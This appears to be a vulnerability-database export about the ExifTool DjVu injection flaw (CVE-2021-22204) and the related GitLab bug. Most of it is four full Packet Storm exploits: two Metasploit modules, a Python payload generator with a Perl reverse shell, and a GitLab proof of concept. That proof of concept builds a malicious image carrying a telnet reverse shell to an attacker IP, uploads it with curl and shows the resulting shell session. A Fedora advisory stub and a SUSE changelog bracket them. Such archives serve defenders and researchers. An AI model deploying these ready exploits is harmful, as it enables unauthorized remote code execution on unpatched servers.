Update: perl-Image-ExifTool-12.16-3.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-05T01:23:07", "id": "FEDORA:06290304CAE5", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/U4RF6PJCJ6NQOVJJJF6HN6BORUQVIXY6/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-12T14:24:18", "description": "", "cvss3": {}, "published": "2021-05-12T00:00:00", "type": "packetstorm", "title": "ExifTool DjVu ANT Perl Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-12T00:00:00", "id": "PACKETSTORM:162558", "href": "https://packetstormsecurity.com/files/162558/ExifTool-DjVu-ANT-Perl-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ExifTool DjVu ANT Perl injection', \n'Description' => %q{ \nThis module exploits a Perl injection vulnerability in the DjVu ANT \nparsing code of ExifTool versions 7.44 through 12.23 inclusive. The \ninjection is used to execute a shell command using Perl backticks. \nThe DjVu image can be embedded in a wrapper image using the \nHasselbladExif EXIF field. 
\n}, \n'Author' => [ \n'William Bowling', # Vulnerability discovery \n'Justin Steven' # Metasploit module \n], \n'References' => [ \n%w[CVE 2021-22204], \n%w[URL https://twitter.com/wcbowling/status/1385803927321415687], \n%w[URL https://github.com/exiftool/exiftool/commit/cf0f4e7dcd024ca99615bfd1102a841a25dde031], \n%w[URL https://www.openwall.com/lists/oss-security/2021/05/10/5] \n], \n'DisclosureDate' => '2021-05-24', \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => false, \n'Payload' => { \n'DisableNops' => true, \n'Space' => 2000, \n'BadChars' => \"\\x22\\x24\\x40\\x60\\x5c\" # \", $, @, ` and \\ \n}, \n'Targets' => [ \n['JPEG file', { template: 'msf.jpg' }], \n['TIFF file', { template: 'msf.tif' }], \n['DjVu file', { template: 'msf.djvu' }] \n], \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('FILENAME', [true, 'Output file', 'msf.jpg']) \n]) \nend \n \ndef exploit \np = payload.encoded \n \nbuf = djvu_template.sub('echo vulnerable > /dev/tty', p) \nbuf[8, 4] = [209 + p.length].pack('L>') # Fix up DJVM length \nbuf[174, 4] = [43 + p.length].pack('L>') # Fix up DJVI length \nbuf[186, 4] = [31 + p.length].pack('L>') # Fix up ANTa length \n \nif target.name == 'JPEG file' \njpeg_buf = jpeg_template \njpeg_buf[86, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length) \nbuf = jpeg_buf \nelsif target.name == 'TIFF file' \ntif_buf = tif_template \ntif_buf[206, 2221] = buf + Rex::Text.rand_text_alphanumeric(2221 - buf.length) \nbuf = tif_buf \nend \n \nfile_create(buf) \nend \n \ndef djvu_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.djvu' \n)) \nend \n \ndef jpeg_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.jpg' \n)) \nend \n \ndef tif_template \nFile.read(File.join( \nMsf::Config.data_directory, 'exploits', 'CVE-2021-22204', 'msf.tif' \n)) \nend \nend \n`\n", "cvss": {"score": 6.8, 
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162558/exiftool_djvu_ant_perl_injection.rb.txt"}, {"lastseen": "2022-05-11T16:48:38", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "ExifTool 12.23 Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167038", "href": "https://packetstormsecurity.com/files/167038/ExifTool-12.23-Arbitrary-Code-Execution.html", "sourceData": "`# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution \n# Date: 04/30/2022 \n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) \n# Vendor Homepage: https://exiftool.org/ \n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip \n# Version: 7.44-12.23 \n# Tested on: ExifTool 12.23 (Debian) \n# CVE: CVE-2021-22204 \n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 \n# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up 
allows arbitrary code execution when parsing the malicious image \n \n#!/usr/bin/env python3 \n \n# Imports \nimport base64 \nimport os \nimport subprocess \nimport sys \n \n# Class for colors \nclass color: \nred = '\\033[91m' \ngold = '\\033[93m' \nblue = '\\033[36m' \ngreen = '\\033[92m' \nno = '\\033[0m' \n \n# Print UNICORD ASCII Art \ndef UNICORD_ASCII(): \nprint(rf\"\"\" \n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} \n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no} \n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} \n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no} \n\"\"\") \n \n# Print exploit help menu \ndef help(): \nprint(r\"\"\"UNICORD Exploit for CVE-2021-22204 \n \nUsage: \npython3 exploit-CVE-2021-22204.py -c <command> \npython3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> \npython3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] \npython3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] \npython3 exploit-CVE-2021-22204.py -h \n \nOptions: \n-c Custom command mode. Provide command to execute. \n-s Reverse shell mode. Provide local IP and port. \n-i Path to custom JPEG image. (Optional) \n-h Show this help menu. 
\n\"\"\") \n \n# Run the exploit \ndef exploit(command): \n \nUNICORD_ASCII() \n \n# Create perl payload \npayload = \"(metadata \\\"\\c${\" \npayload += command \npayload += \"};\\\")\" \n \nprint(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\") \nprint(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\") \n \n# Write payload to file \npayloadFile = open('payload','w') \npayloadFile.write(payload) \npayloadFile.close() \n \n# Bzz compress file \nsubprocess.run(['bzz', 'payload', 'payload.bzz']) \n \n# Run djvumake \nsubprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz']) \n \nif '-i' in sys.argv: \nimagePath = sys.argv[sys.argv.index('-i') + 1] \nsubprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) \n \nelse: \n# Smallest possible JPEG \nimage = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\" \n \n# Write smallest possible JPEG image to file \nwith open(\"image.jpg\", \"wb\") as img: \nimg.write(base64.decodebytes(image)) \n \n# Write exiftool config to file \nconfig = (r\"\"\" \n%Image::ExifTool::UserDefined = ( \n'Image::ExifTool::Exif::Main' => { \n0xc51b => { \nName => 'HasselbladExif', \nWritable => 'string', \nWriteGroup => 'IFD0', \n}, \n}, \n); \n1; #end \n\"\"\") \nconfigFile = open('exiftool.config','w') \nconfigFile.write(config) \nconfigFile.close() \n \n# Exiftool config for output image \nsubprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) \n \n# Delete leftover files \nos.remove(\"payload\") \nos.remove(\"payload.bzz\") \nos.remove(\"exploit.djvu\") \nos.remove(\"exiftool.config\") \n \n# Print results \nprint(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\") \n \nexit() \n \nif __name__ == \"__main__\": 
\n \nargs = ['-h','-c','-s','-i'] \n \nif args[0] in sys.argv: \nhelp() \n \nelif args[1] in sys.argv and not args[2] in sys.argv: \nexec = sys.argv[sys.argv.index(args[1]) + 1] \ncommand = f\"system(\\'{exec}\\')\" \nexploit(command) \n \nelif args[2] in sys.argv and not args[1] in sys.argv: \nlocalIP = sys.argv[sys.argv.index(args[2]) + 1] \nlocalPort = sys.argv[sys.argv.index(args[2]) + 2] \ncommand = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\" \nexploit(command) \n \nelse: \nhelp() \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167038/exiftool1223-exec.txt"}, {"lastseen": "2021-11-17T17:16:06", "description": "", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "packetstorm", "title": "GitLab 13.10.2 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], 
"modified": "2021-11-17T00:00:00", "id": "PACKETSTORM:164994", "href": "https://packetstormsecurity.com/files/164994/GitLab-13.10.2-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) \n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 \n# Date: 11/01/2021 \n# Exploit Author: Jacob Baines \n# Vendor Homepage: https://about.gitlab.com/ \n# Software Link: https://gitlab.com/gitlab-org/gitlab \n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8 \n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu) \n# CVE : CVE-2021-22205 \n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/ \n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed \n \nCode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it. \n \n1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270. 
\n \necho -e \n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\" \n| base64 -d > lol.jpg \necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg \necho -n \n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\" \n| base64 -d >> lol.jpg \n \n2. Sending the payload. Any random endpoint will do. \n \ncurl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8) \n \n2a. 
Sample Output from the reverse shell: \n \n$ nc -lnvp 1270 \nListening on [0.0.0.0] (family 0, port 1270) \nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport \n34836) \nwhoami \ngit \nid \nuid=998(git) gid=998(git) groups=998(git) \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164994/gitlab13102reverse-exec.txt"}, {"lastseen": "2021-11-04T16:11:15", "description": "", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T00:00:00", "type": "packetstorm", "title": "GitLab Unauthenticated Remote ExifTool Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-04T00:00:00", "id": "PACKETSTORM:164768", "href": "https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote 
\nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection', \n'Description' => %q{ \nThis module exploits an unauthenticated file upload and command \ninjection vulnerability in GitLab Community Edition (CE) and \nEnterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, \nand 13.8.8. \n \nExploitation will result in command execution as the git user. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC \n'jbaines-r7' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-22205' ], # GitLab \n[ 'CVE', '2021-22204' ], # ExifTool \n[ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ], \n[ 'URL', 'https://hackerone.com/reports/1154542' ], \n[ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ], \n[ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ] \n], \n'DisclosureDate' => '2021-04-14', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'Payload' => { \n'Space' => 290, \n'DisableNops' => true, \n'BadChars' => '#' \n}, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_openssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], 
\n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef upload_file(file_data, timeout = 20) \nrandom_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\" \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \nfile_data, \n'image/jpeg', \n'binary', \n\"form-data; name=\\\"file\\\"; filename=\\\"#{random_filename}\\\"\" \n) \n \nrandom_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12)) \nprint_status(\"Uploading #{random_filename} to #{random_uri}\") \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => random_uri, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n}, timeout) \nend \n \ndef check \n# Checks if the instance is a GitLab install by looking for the \n# 'About GitLab' footer or a password redirect. If that's successful \n# a bogus jpg image is uploaded to a bogus URI. The patched versions \n# should never send the bad image to ExifTool, resulting in a 404. \n# The unpatched versions should feed the image to the vulnerable \n# ExifTool, resulting in a 422 error message. \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/users/sign_in') \n}) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# handle two cases. First a normal install will respond with HTTP 200. \n# Second, if the root password hasn't been set yet then this will \n# redirect to the password reset page. 
\nunless (res.code == 200 && res.body.include?('>About GitLab<')) || \n(res.code == 302 && res.body.include?('/users/password/edit?reset_password_token')) \nreturn CheckCode::Safe('Not a GitLab web interface') \nend \n \nres = upload_file(rand_text_alphanumeric(6..32)) \nunless res \nreturn CheckCode::Detected('The target did not respond to the upload request.') \nend \n \ncase res.code \nwhen 422 \nif res.body.include?('The change you requested was rejected.') \nreturn CheckCode::Vulnerable('The error response indicates ExifTool was executed.') \nend \nwhen 404 \nif res.body.include?('The page could not be found') \nreturn CheckCode::Safe('The error response indicates ExifTool was not run.') \nend \nend \n \nreturn CheckCode::Detected \nend \n \ndef execute_command(cmd, _opts = {}) \n# printf needs all '\\' to be double escaped due to ExifTool parsing \nif cmd.start_with?('printf ') \ncmd = cmd.gsub('\\\\', '\\\\\\\\\\\\') \nend \n \n# header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure. \n# The 'cmd' variable is sandwiched in a qx## function. \npayload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\ \n\"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\ \n\"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\ \n\"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\ \n\"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\ \n\"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\" \npayload_trailer = \"# . 
\\\\\\x0a\\\" b \\\") )\" + (' ' * 421) \n \nres = upload_file(payload_header + cmd + payload_trailer, 5) \n \n# Successful exploitation can result in no response (connection being held open by a reverse shell) \n# or, if the command executes immediately, a response with a 422. \nif res && res.code != 422 \nfail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\") \nend \n \nprint_good('Exploit successfully executed.') \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# payload is truncated by exiftool after 290 bytes. Because we need to \n# expand the printf flavor by a potential factor of 2, halve the linemax. \nexecute_cmdstager(linemax: 144) \nend \nend \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164768/gitlab_exif_rce.rb.txt"}], "suse": [{"lastseen": "2022-11-10T08:10:24", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for perl-Image-ExifTool fixes the following issues:\n\n Update to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n * JPEG XL support is now official\n * Added read support for Medical Research Council (MRC) image files\n * Added ability to write a number of 3gp tags in video files\n * Added a new Sony PictureProfile value (thanks Jos Roost)\n * Added a new Sony LensType (thanks LibRaw)\n * Added a new Nikon LensID (thanks Niels Kristian Bech Jensen)\n * Added a new Canon LensType\n * Decode more GPS information from Blackvue dashcam videos\n * Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n * Decode a few new RIFF tags\n * Improved Validate option to add minor warning if standard XMP is missing\n xpacket wrapper\n * Avoid decoding some large arrays in DNG images to improve 
performance\n unless the -m option is used\n * Patched bug that could give runtime warning when trying to write an\n empty XMP structure\n * Fixed decoding of ImageWidth/Height for JPEG XL images\n * Fixed problem were Microsoft Xtra tags couldn't be deleted\n\n version 12.24:\n\n * Added a new PhaseOne RawFormat value (thanks LibRaw)\n * Decode a new Sony tag (thanks Jos Roost)\n * Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and\n Greybeard)\n * Patched security vulnerability in DjVu reader\n * Updated acdsee.config in distribution (thanks StarGeek)\n * Recognize AutoCAD DXF files\n * More work on experimental JUMBF read support\n * More work on experimental JPEG XL read/write support\n\n version 12.23:\n\n * Added support for Olympus ORI files\n * Added experimental read/write support for JPEG XL images\n * Added experimental read support for JUMBF metadata in JPEG and Jpeg2000\n images\n * Added built-in support for parsing GPS track from Denver ACG-8050 videos\n with the -ee option\n * Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n * Changed priority of Samsung trailer tags so the first DepthMapImage\n takes precedence when -a is not used\n * Improved identification of M4A audio files\n * Patched to avoid escaping ',' in \"Binary data\" message when\n -struct is used\n * Removed Unknown flag from MXF VideoCodingSchemeID tag\n * Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n * API Changes:\n + Added BlockExtract option\n\n version 12.22:\n\n * Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost\n and LibRaw)\n * Added Extra BaseName tag\n * Added a new CanonModelID (thanks LibRaw)\n * Decode timed GPS from unlisted programs in M2TS videos with the -ee3\n option\n * Decode more Sony rtmd tags\n * Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n * Allow negative values to be written to XMP-aux:LensID\n * Recognize HEVC video program in M2TS files\n * Enhanced -b option so --b 
suppresses tags with binary data\n * Improved flexibility when writing GPS coordinates:\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n + Recognizes the full word \"South\" and \"West\" to write negative\n coordinates\n * Improved warning when trying to write an integer QuickTime date/time tag\n and Time::Local is not available\n * Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\n version 12.21:\n\n * Added a few new iOS QuickTime tags\n * Decode a couple more Sony rtmd tags\n * Patch to avoid possible \"Use of uninitialized value\" warning when\n attempting to write QuickTime date/time tags with an invalid value\n * Fixed problem writing Microsoft Xtra tags\n * Fixed Windows daylight savings time patch for file times that was broken\n in 12.19 (however directory times will not yet handle DST properly)\n\n version 12.20:\n\n * Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n * Added two new Canon LensType values (thanks Norbert Wasser)\n * Added a new Nikon LensID\n * Fixed problem reading FITS comments that start before column 11\n\n version 12.19:\n\n * Added -list_dir option\n * Added the \"ls-l\" Shortcut tag\n * Extract Comment and History from FITS files\n * Enhanced FilePermissions to include device type (similar to \"ls -l\")\n * Changed the name of Apple ContentIdentifier tag to MediaGroupUUID\n (thanks Neal Krawetz)\n * Fixed a potential \"substr outside of string\" runtime error when reading\n corrupted EXIF\n * Fixed edge case where NikonScanIFD may not be copied properly when\n copying MakerNotes to another file\n * API Changes:\n + Added ability to read/write System tags of directories\n + Enhanced GetAllGroups() to support family 7 and take\n optional ExifTool reference\n + Changed QuickTimeHandler option default to 1\n\n version 12.18:\n\n * Added a new SonyModelID\n * Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n * Decode a couple of new Canon tags (thanks 
LibRaw)\n * Patched to read differently formatted UserData:Keywords as written by\n iPhone\n * Patched to tolerate out-of-order Nikon MakerNote IFD entries when\n obtaining tags necessary for decryption\n * Fixed a few possible Condition warnings for some NikonSettings tags\n\n version 12.17:\n\n * Added a new Canon FocusMode value\n * Added a new FujiFilm FilmMode value\n * Added a number of new XMP-crs tags (thanks Herb)\n * Decode a new H264 MDPM tag\n * Allow non-conforming lower-case XMP boolean \"true\" and \"false\" values to\n be written, but only when print conversion is disabled\n * Improved Validate option to warn about non-capitalized boolean XMP values\n * Improved logic for setting GPSLatitude/LongitudeRef values when writing\n * Changed -json and -php options so the -a option is implied even without\n the -g option\n * Avoid extracting audio/video data from AVI videos when -ee\n -u is used\n * Patched decoding of Canon ContinuousShootingSpeed for newer firmware\n versions of the EOS-1DXmkIII\n * Re-worked LensID patch of version 12.00 (github issue #51)\n * Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n * Fixed problem where group could not be specified for PNG-pHYs tags when\n writing version 12.16:\n * Extract another form of video subtitle text\n * Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264\n video stream in MP4 files\n * Changed a Nikon FlashMode value\n * Fixed problem that caused a failed DPX test on Strawberry Perl\n * API Changes:\n + Enhanced ExtractEmbedded option\n\n version 12.15:\n\n * Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n * Added a new Nikon FlashMode value (thanks Mike)\n * Decode NikonSettings (thanks Warren Hatch)\n * Decode 